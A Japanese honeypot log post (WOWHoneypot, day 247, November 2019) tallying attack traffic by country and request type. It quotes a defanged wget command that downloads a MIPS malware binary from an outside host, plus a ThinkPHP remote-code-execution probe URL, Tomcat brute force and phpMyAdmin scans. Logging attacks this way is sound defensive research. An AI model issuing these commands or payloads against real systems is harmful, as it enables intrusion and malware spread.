23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(247日目)

2019/11/18(月)

トータルは4109件でした。

ハンティングログは以下です。

86.159.81[.]26 wget+hxxp[:]//185.172.110[.]220/mipsel

www.virustotal.com
www.virustotal.com

IPのロケーション別の件数は以下です。

ポルトガル 4002
アメリ 16
オランダ 11
中国 10
ロシア 8
フランス 7
ドイツ 5
ブラジル 4
エジプト 3
イギリス 3
トルコ 2
ベトナム 1
スペイン 1
イタリア 1
シンガポール 1
カンボジア 1
セルビア 1
ンド 1

f:id:sec23:20191206164545p:plain

件数 概要 リクエス
4004 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
33 アクセス GET /
4 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
3 phpMyAdminの調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
3 phpMyAdminの調査 GET /pma/scripts/setup.php
3 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
3 phpMyAdminの調査 GET /myadmin/scripts/setup.php
3 phpMyAdminの調査 GET /MyAdmin/scripts/setup.php
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
3 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 調査 HEAD /
2 ordPress の Pingback を狙った通信 GET /xmlrpc.php
2 調査 GET /script
1 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
1 クローリング GET /robots.txt
1 phpMyAdminの調査 GET /mysql/scripts/setup.php
1 phpMyAdminの調査 GET /SQL/scripts/setup.php